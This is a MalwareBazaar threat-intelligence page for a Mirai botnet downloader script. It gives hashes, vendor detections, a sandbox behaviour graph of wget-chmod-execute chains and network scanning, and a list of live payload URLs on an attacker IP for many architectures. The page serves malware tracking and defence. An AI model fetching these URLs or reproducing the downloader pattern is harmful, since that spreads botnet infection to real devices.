MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2
SHA3-384 hash: 73f6732d4ed0cd83aa06dd233b0f2b87effe55f693abeb077c5782e05863e9abd71612397e4d5348adb64c8f2aad044a
SHA1 hash: ed0fe873b18ecf1a4eafd2d6c8c3910aa972bd69
MD5 hash: a33eba147806dfdcbdbc30e17b9de982
humanhash: johnny-lactose-victor-cat
File name:wget.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:1'086 bytes
First seen:2025-11-11 23:42:35 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 12:Aq+5oaL+5WNIQQA+57vK2H+5tKA+5bH+5q+5g5+5oH+5IcA+5u3A+5JzAUv:aNI5KmTdBV5dv
TLSH T106113AF91015512A12086F11706A09396EFBF7E2A0359EF454BFE42361CB5D07726F7B
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://213.209.143.62/UnHAnaAW.arm22902a825f4b5e45d050e75fd997518f670dcc1ed147719e025a97334e1fcd91 Miraiarm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm54bab044accc55cd8b091514d74bfb44eaaea95272ee653e93948925e24b25c7a Miraiarm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm69f32df4b92beb06bfed9f04284c434379715cfcba0a62fa6bd568928c146dfd4 Miraiarm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm751bb3572999cd4a4b25fd0cc06b061674df3373767c789ceff16b677a2e4bdc5 Miraiarm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.sh4139cf5e5c3b4a3175dfda683eaefe4e6bd5310afa3d6d679363a224a6c69feea Miraielf geofenced mirai opendir SuperH ua-wget USA
http://213.209.143.62/UnHAnaAW.ppc74e244774df73843123066181b2bb2ee1b7a62fedc22e6e936adc6e21307e42c Miraielf geofenced mirai opendir PowerPC ua-wget USA
http://213.209.143.62/UnHAnaAW.mips1aeffd0f72ac38ac1af0f86a925957eb88cff0184d6628b48ee9f452dcf8ce9c Miraielf geofenced mips mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.mpslf91fa8a4c5e27570471adaa1d53a68ad32a4c38f8f9f12d74bbf5614b3baaf14 Miraielf geofenced mips mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.spcb19d8245d8adeb27944deefd2ae7662e4bda0c3098c964e94b5326acbec78755 Miraielf geofenced mirai opendir sparc ua-wget USA
http://213.209.143.62/UnHAnaAW.x8642efa473fa16cd174a1394892b7163f4e47c0434d1138d120135451514465617 Miraielf geofenced mirai opendir ua-wget USA x86
http://213.209.143.62/UnHAnaAW.x86_645c4b64e559c1332e9f65c611909524c68ad73d63878cd6e36602c17303d0985b Miraielf geofenced mirai opendir ua-wget USA x86
http://213.209.143.62/UnHAnaAW.i586n/an/aelf

Intelligence

File Origin
# of uploads :
1
# of downloads :
49
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Shell.Downloader.Gen-1.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
mirai
Link:
https://www.filescan.io/uploads/6913ca12935d9f0d73ce7e51/reports/42acdb81-a318-411c-98ec-7f9de59ff6ef/overview
Verdict:
Malicious
File Type:
ps1
First seen:
2025-11-12T00:20:00Z UTC
Last seen:
2025-11-12T00:37:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/2fab80d2-dd88-4d0f-b5a1-0c91a8c5b336
Behavior Graph:
Download SVG
%3 guuid=8493a574-1a00-0000-eb98-aab8c30d0000 pid=3523 /usr/bin/sudo guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525 /tmp/sample.bin guuid=8493a574-1a00-0000-eb98-aab8c30d0000 pid=3523->guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525 execve guuid=fe242f77-1a00-0000-eb98-aab8c60d0000 pid=3526 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=fe242f77-1a00-0000-eb98-aab8c60d0000 pid=3526 execve guuid=2212a57d-1a00-0000-eb98-aab8d50d0000 pid=3541 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=2212a57d-1a00-0000-eb98-aab8d50d0000 pid=3541 execve guuid=5afd047e-1a00-0000-eb98-aab8d70d0000 pid=3543 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=5afd047e-1a00-0000-eb98-aab8d70d0000 pid=3543 clone guuid=4c34c37e-1a00-0000-eb98-aab8dc0d0000 pid=3548 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=4c34c37e-1a00-0000-eb98-aab8dc0d0000 pid=3548 execve guuid=d16b4783-1a00-0000-eb98-aab8e60d0000 pid=3558 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=d16b4783-1a00-0000-eb98-aab8e60d0000 pid=3558 execve guuid=f6e97c83-1a00-0000-eb98-aab8e80d0000 pid=3560 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=f6e97c83-1a00-0000-eb98-aab8e80d0000 pid=3560 clone guuid=823f0c84-1a00-0000-eb98-aab8ee0d0000 pid=3566 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=823f0c84-1a00-0000-eb98-aab8ee0d0000 pid=3566 execve guuid=b3578588-1a00-0000-eb98-aab8f60d0000 pid=3574 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=b3578588-1a00-0000-eb98-aab8f60d0000 pid=3574 execve guuid=18ad0389-1a00-0000-eb98-aab8f90d0000 pid=3577 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=18ad0389-1a00-0000-eb98-aab8f90d0000 pid=3577 clone guuid=8d5ecd89-1a00-0000-eb98-aab8fe0d0000 pid=3582 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=8d5ecd89-1a00-0000-eb98-aab8fe0d0000 pid=3582 execve guuid=6ab84c8f-1a00-0000-eb98-aab80f0e0000 pid=3599 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=6ab84c8f-1a00-0000-eb98-aab80f0e0000 pid=3599 execve guuid=ef8b8a8f-1a00-0000-eb98-aab8100e0000 pid=3600 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=ef8b8a8f-1a00-0000-eb98-aab8100e0000 pid=3600 clone guuid=be895991-1a00-0000-eb98-aab8150e0000 pid=3605 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=be895991-1a00-0000-eb98-aab8150e0000 pid=3605 execve guuid=c439a196-1a00-0000-eb98-aab8220e0000 pid=3618 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=c439a196-1a00-0000-eb98-aab8220e0000 pid=3618 execve guuid=fdf5d396-1a00-0000-eb98-aab8240e0000 pid=3620 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=fdf5d396-1a00-0000-eb98-aab8240e0000 pid=3620 clone guuid=b215a297-1a00-0000-eb98-aab8290e0000 pid=3625 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=b215a297-1a00-0000-eb98-aab8290e0000 pid=3625 execve guuid=4df4f99b-1a00-0000-eb98-aab8380e0000 pid=3640 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=4df4f99b-1a00-0000-eb98-aab8380e0000 pid=3640 execve guuid=69a7349c-1a00-0000-eb98-aab8390e0000 pid=3641 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=69a7349c-1a00-0000-eb98-aab8390e0000 pid=3641 clone guuid=23f3b59c-1a00-0000-eb98-aab8400e0000 pid=3648 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=23f3b59c-1a00-0000-eb98-aab8400e0000 pid=3648 execve guuid=597510a2-1a00-0000-eb98-aab8530e0000 pid=3667 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=597510a2-1a00-0000-eb98-aab8530e0000 pid=3667 execve guuid=ed4667a2-1a00-0000-eb98-aab8550e0000 pid=3669 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=ed4667a2-1a00-0000-eb98-aab8550e0000 pid=3669 clone guuid=9b4870a2-1a00-0000-eb98-aab8570e0000 pid=3671 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=9b4870a2-1a00-0000-eb98-aab8570e0000 pid=3671 execve guuid=421be4a7-1a00-0000-eb98-aab8670e0000 pid=3687 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=421be4a7-1a00-0000-eb98-aab8670e0000 pid=3687 execve guuid=f2b72aa8-1a00-0000-eb98-aab8680e0000 pid=3688 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=f2b72aa8-1a00-0000-eb98-aab8680e0000 pid=3688 clone guuid=d55bd6a8-1a00-0000-eb98-aab86a0e0000 pid=3690 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=d55bd6a8-1a00-0000-eb98-aab86a0e0000 pid=3690 execve guuid=50285eae-1a00-0000-eb98-aab86b0e0000 pid=3691 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=50285eae-1a00-0000-eb98-aab86b0e0000 pid=3691 execve guuid=3921adae-1a00-0000-eb98-aab86c0e0000 pid=3692 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=3921adae-1a00-0000-eb98-aab86c0e0000 pid=3692 clone guuid=b69c5baf-1a00-0000-eb98-aab86e0e0000 pid=3694 /usr/bin/wget net send-data write-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=b69c5baf-1a00-0000-eb98-aab86e0e0000 pid=3694 execve guuid=d3c5dfb3-1a00-0000-eb98-aab8760e0000 pid=3702 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=d3c5dfb3-1a00-0000-eb98-aab8760e0000 pid=3702 execve guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704 /home/sandbox/UnHAnaAW.x86 net guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704 execve guuid=28af60b4-1a00-0000-eb98-aab87d0e0000 pid=3709 /usr/bin/wget net send-data guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=28af60b4-1a00-0000-eb98-aab87d0e0000 pid=3709 execve guuid=2677bfc3-1a00-0000-eb98-aab89e0e0000 pid=3742 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=2677bfc3-1a00-0000-eb98-aab89e0e0000 pid=3742 execve guuid=9ebb21c4-1a00-0000-eb98-aab89f0e0000 pid=3743 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=9ebb21c4-1a00-0000-eb98-aab89f0e0000 pid=3743 clone guuid=6d0147c4-1a00-0000-eb98-aab8a10e0000 pid=3745 /usr/bin/wget net send-data guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=6d0147c4-1a00-0000-eb98-aab8a10e0000 pid=3745 execve guuid=ee8057c8-1a00-0000-eb98-aab8b20e0000 pid=3762 /usr/bin/chmod guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=ee8057c8-1a00-0000-eb98-aab8b20e0000 pid=3762 execve guuid=67039bc8-1a00-0000-eb98-aab8b60e0000 pid=3766 /usr/bin/dash guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=67039bc8-1a00-0000-eb98-aab8b60e0000 pid=3766 clone guuid=b857a3c8-1a00-0000-eb98-aab8b70e0000 pid=3767 /usr/bin/rm delete-file guuid=c829ee76-1a00-0000-eb98-aab8c50d0000 pid=3525->guuid=b857a3c8-1a00-0000-eb98-aab8b70e0000 pid=3767 execve eaaaaddb-f5f1-5090-9f4d-096f63c93adc 213.209.143.62:80 guuid=fe242f77-1a00-0000-eb98-aab8c60d0000 pid=3526->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 141B guuid=4c34c37e-1a00-0000-eb98-aab8dc0d0000 pid=3548->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=823f0c84-1a00-0000-eb98-aab8ee0d0000 pid=3566->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=8d5ecd89-1a00-0000-eb98-aab8fe0d0000 pid=3582->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=be895991-1a00-0000-eb98-aab8150e0000 pid=3605->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 141B guuid=b215a297-1a00-0000-eb98-aab8290e0000 pid=3625->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 141B guuid=23f3b59c-1a00-0000-eb98-aab8400e0000 pid=3648->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=9b4870a2-1a00-0000-eb98-aab8570e0000 pid=3671->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=d55bd6a8-1a00-0000-eb98-aab86a0e0000 pid=3690->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 141B guuid=b69c5baf-1a00-0000-eb98-aab86e0e0000 pid=3694->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 141B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=7de94fb4-1a00-0000-eb98-aab87a0e0000 pid=3706 /home/sandbox/UnHAnaAW.x86 guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704->guuid=7de94fb4-1a00-0000-eb98-aab87a0e0000 pid=3706 clone guuid=e9a253b4-1a00-0000-eb98-aab87b0e0000 pid=3707 /home/sandbox/UnHAnaAW.x86 guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704->guuid=e9a253b4-1a00-0000-eb98-aab87b0e0000 pid=3707 clone guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708 /home/sandbox/UnHAnaAW.x86 net send-data zombie guuid=67fe26b4-1a00-0000-eb98-aab8780e0000 pid=3704->guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708 clone guuid=958367fb-2000-0000-eb98-aab8c7140000 pid=5319 /home/sandbox/UnHAnaAW.x86 guuid=7de94fb4-1a00-0000-eb98-aab87a0e0000 pid=3706->guuid=958367fb-2000-0000-eb98-aab8c7140000 pid=5319 clone guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320 /home/sandbox/UnHAnaAW.x86 net zombie guuid=7de94fb4-1a00-0000-eb98-aab87a0e0000 pid=3706->guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320 clone guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 1491f2a5-a4ef-5eb9-bced-3da3f0c99427 213.209.143.62:1024 guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->1491f2a5-a4ef-5eb9-bced-3da3f0c99427 send: 16B guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710 clone guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711 clone guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712 clone guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713 /home/sandbox/UnHAnaAW.x86 net send-data guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713 clone guuid=b1eb7fb4-1a00-0000-eb98-aab8820e0000 pid=3714 /home/sandbox/UnHAnaAW.x86 guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=b1eb7fb4-1a00-0000-eb98-aab8820e0000 pid=3714 clone guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=12a757b4-1a00-0000-eb98-aab87c0e0000 pid=3708->guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715 clone guuid=28af60b4-1a00-0000-eb98-aab87d0e0000 pid=3709->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 144B guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710|send-data send-data to 4097 IP addresses review logs to see them all guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710->guuid=b0fc6eb4-1a00-0000-eb98-aab87e0e0000 pid=3710|send-data send guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 4968ea7f-0d2f-5e18-881b-5a7b60b3f621 95.155.36.125:80 guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711->4968ea7f-0d2f-5e18-881b-5a7b60b3f621 send: 40B b8900793-e595-5be8-aec7-77b1358680de 88.99.113.28:80 guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711->b8900793-e595-5be8-aec7-77b1358680de con ffafbfc5-2348-59d9-941e-62dd3b596ccf 88.221.130.53:80 guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711->ffafbfc5-2348-59d9-941e-62dd3b596ccf con guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711|send-data send-data to 4097 IP addresses review logs to see them all guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711->guuid=5da072b4-1a00-0000-eb98-aab87f0e0000 pid=3711|send-data send guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 16ca29f3-d0d5-5739-9da7-395935d237be 31.33.136.150:8080 guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712->16ca29f3-d0d5-5739-9da7-395935d237be send: 353B 2d506b5d-e3ad-5051-bdba-8ac56074655e 94.20.46.15:8080 guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712->2d506b5d-e3ad-5051-bdba-8ac56074655e send: 353B guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712|send-data send-data to 4095 IP addresses review logs to see them all guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712->guuid=86ab76b4-1a00-0000-eb98-aab8800e0000 pid=3712|send-data send guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713->1491f2a5-a4ef-5eb9-bced-3da3f0c99427 send: 12B guuid=cfebcae7-2000-0000-eb98-aab8c5140000 pid=5317 /home/sandbox/UnHAnaAW.x86 guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713->guuid=cfebcae7-2000-0000-eb98-aab8c5140000 pid=5317 clone guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=92b97bb4-1a00-0000-eb98-aab8810e0000 pid=3713->guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318 clone guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con f18f278c-376c-5e3f-a4cd-38411cf8a32d 38.181.157.173:23 guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715->f18f278c-376c-5e3f-a4cd-38411cf8a32d send: 40B c66933bf-52be-5027-af43-b3e7e4d3c577 187.102.200.58:23 guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715->c66933bf-52be-5027-af43-b3e7e4d3c577 con guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715|send-data send-data to 4097 IP addresses review logs to see them all guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715->guuid=bf4b84b4-1a00-0000-eb98-aab8830e0000 pid=3715|send-data send guuid=6d0147c4-1a00-0000-eb98-aab8a10e0000 pid=3745->eaaaaddb-f5f1-5090-9f4d-096f63c93adc send: 142B guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318|send-data send-data to 4097 IP addresses review logs to see them all guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318->guuid=32c9dbe7-2000-0000-eb98-aab8c6140000 pid=5318|send-data send guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->1491f2a5-a4ef-5eb9-bced-3da3f0c99427 con guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321 clone guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322 clone guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323 clone guuid=e4d386fb-2000-0000-eb98-aab8cc140000 pid=5324 /home/sandbox/UnHAnaAW.x86 net guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=e4d386fb-2000-0000-eb98-aab8cc140000 pid=5324 clone guuid=d2ea89fb-2000-0000-eb98-aab8cd140000 pid=5325 /home/sandbox/UnHAnaAW.x86 guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=d2ea89fb-2000-0000-eb98-aab8cd140000 pid=5325 clone guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=47ac6dfb-2000-0000-eb98-aab8c8140000 pid=5320->guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326 clone guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321|send-data send-data to 4097 IP addresses review logs to see them all guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321->guuid=7d847bfb-2000-0000-eb98-aab8c9140000 pid=5321|send-data send guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 33a617d2-598f-571f-9a94-ccc0749b126e 88.149.130.8:80 guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322->33a617d2-598f-571f-9a94-ccc0749b126e con guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322|send-data send-data to 4097 IP addresses review logs to see them all guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322->guuid=d04f7ffb-2000-0000-eb98-aab8ca140000 pid=5322|send-data send guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323|send-data send-data to 4097 IP addresses review logs to see them all guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323->guuid=dc9882fb-2000-0000-eb98-aab8cb140000 pid=5323|send-data send guuid=e4d386fb-2000-0000-eb98-aab8cc140000 pid=5324->1491f2a5-a4ef-5eb9-bced-3da3f0c99427 con guuid=b3ac7e25-2600-0000-eb98-aab8cf140000 pid=5327 /home/sandbox/UnHAnaAW.x86 guuid=e4d386fb-2000-0000-eb98-aab8cc140000 pid=5324->guuid=b3ac7e25-2600-0000-eb98-aab8cf140000 pid=5327 clone guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328 /home/sandbox/UnHAnaAW.x86 net net-scan send-data guuid=e4d386fb-2000-0000-eb98-aab8cc140000 pid=5324->guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328 clone guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326|send-data send-data to 4097 IP addresses review logs to see them all guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326->guuid=ee5b8efb-2000-0000-eb98-aab8ce140000 pid=5326|send-data send guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328|send-data send-data to 4097 IP addresses review logs to see them all guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328->guuid=c89c8425-2600-0000-eb98-aab8d0140000 pid=5328|send-data send
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2/
Threat name:
Script-Shell.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-11-11 23:43:15 UTC
File Type:
Text
AV detection:
14 of 36 (38.89%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=3ii5r7qibd3xcxmwipgouy2m6vxvjifhmzdiy7pkujsqc5fiehza._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251111-3qnf3atlbn/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2

(this sample)

Mirai

elf 22902a825f4b5e45d050e75fd997518f670dcc1ed147719e025a97334e1fcd91

  
URLhaus
https://urlhaus.abuse.ch/url/3667550/
  
Delivery method
Distributed via web download
  
Dropping
MD5 2f42fc7ce4933c752481704986aad715
  
Dropping
SHA256 22902a825f4b5e45d050e75fd997518f670dcc1ed147719e025a97334e1fcd91

Comments